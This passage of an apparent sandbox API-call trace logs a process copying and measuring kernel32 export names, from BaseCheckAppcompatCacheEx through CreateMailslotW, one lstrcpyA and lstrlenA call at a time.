returned="BaseCheckAppcompatCacheEx" [0084.622] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0084.622] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0084.622] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0084.622] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0084.622] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0084.622] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0084.622] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0084.622] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0084.622] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0084.622] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0084.622] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0084.622] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0084.622] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0084.622] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0084.622] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0084.622] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0084.622] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0084.622] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0084.622] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0084.622] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0084.622] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0084.622] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0084.622] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0084.622] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0084.622] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0084.622] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0084.622] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0084.622] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0084.622] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0084.622] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0084.622] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0084.622] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0084.623] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0084.623] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0084.623] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0084.623] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0084.623] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0084.623] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0084.623] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0084.623] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0084.623] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0084.623] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0084.623] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0084.623] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0084.623] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0084.623] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0084.623] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0084.623] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0084.623] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0084.623] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0084.623] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0084.623] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0084.623] lstrlenA (lpString="BEEP") returned 4 [0084.623] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0084.623] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0084.623] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0084.623] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0084.623] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0084.623] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0084.623] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0084.623] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0084.623] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0084.623] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0084.623] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0084.623] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0084.623] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0084.623] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0084.623] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0084.624] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0084.624] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0084.624] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0084.624] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0084.624] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0084.624] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0084.624] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0084.624] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0084.624] lstrlenA (lpString="CANCELIO") returned 8 [0084.624] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0084.624] lstrlenA (lpString="CANCELIOEX") returned 10 [0084.624] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0084.624] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0084.624] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0084.624] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0084.624] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0084.624] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0084.624] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0084.624] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0084.624] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0084.624] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0084.624] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0084.624] lstrlenA (lpString="CHECKELEVATION") returned 14 [0084.624] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0084.624] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0084.624] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0084.624] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0084.624] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0084.624] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0084.624] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0084.624] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0084.624] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0084.624] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0084.624] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0084.624] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0084.624] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0084.625] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0084.625] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0084.625] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0084.625] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0084.625] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0084.625] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0084.625] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0084.625] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0084.625] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0084.625] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0084.625] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0084.625] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0084.625] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0084.625] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0084.625] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0084.625] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0084.625] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0084.625] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0084.625] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0084.625] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0084.625] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0084.625] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0084.625] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0084.625] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0084.625] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0084.625] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0084.625] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0084.625] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0084.625] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0084.625] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0084.625] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0084.625] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0084.625] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0084.625] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0084.625] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0084.625] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0084.625] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0084.626] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0084.626] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0084.626] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0084.626] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0084.626] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0084.626] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0084.626] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0084.626] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0084.626] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0084.626] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0084.626] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0084.626] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0084.626] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0084.626] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0084.626] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0084.626] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0084.626] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0084.626] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0084.626] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0084.626] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0084.626] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0084.626] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0084.626] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0084.626] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0084.626] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0084.626] lstrlenA (lpString="COPYCONTEXT") returned 11 [0084.627] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0084.627] lstrlenA (lpString="COPYFILEA") returned 9 [0084.627] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0084.627] lstrlenA (lpString="COPYFILEEXA") returned 11 [0084.627] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0084.627] lstrlenA (lpString="COPYFILEEXW") returned 11 [0084.627] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0084.627] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0084.627] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0084.627] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0084.627] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0084.627] lstrlenA (lpString="COPYFILEW") returned 9 [0084.627] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0084.627] lstrlenA (lpString="COPYLZFILE") returned 10 [0084.627] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0084.627] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0084.627] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0084.627] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0084.627] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0084.627] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0084.627] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0084.627] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0084.627] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0084.627] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0084.627] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0084.627] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0084.627] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0084.627] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0084.627] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0084.627] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0084.627] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0084.627] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0084.628] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0084.628] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0084.628] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0084.628] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0084.628] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0084.628] lstrlenA (lpString="CREATEEVENTA") returned 12 [0084.628] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0084.628] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0084.628] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0084.628] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0084.628] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0084.628] lstrlenA (lpString="CREATEEVENTW") returned 12 [0084.628] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0084.628] lstrlenA (lpString="CREATEFIBER") returned 11 [0084.628] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0084.628] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0084.628] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0084.628] lstrlenA (lpString="CREATEFILEA") returned 11 [0084.628] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0084.628] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0084.628] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0084.628] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0084.628] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0084.628] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0084.628] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0084.628] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0084.628] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0084.628] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0084.628] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0084.628] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0084.628] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0084.628] lstrlenA (lpString="CREATEFILEW") returned 11 [0084.628] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0084.628] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0084.628] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0084.628] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0084.629] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0084.629] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0084.629] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0084.629] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0084.629] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0084.629] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0084.629] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0084.629] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0084.629] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0084.629] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0084.629] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0084.629] lstrlenA (lpString="CREATEJOBSET") returned 12 [0084.629] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0084.629] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0084.629] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotW" | out: 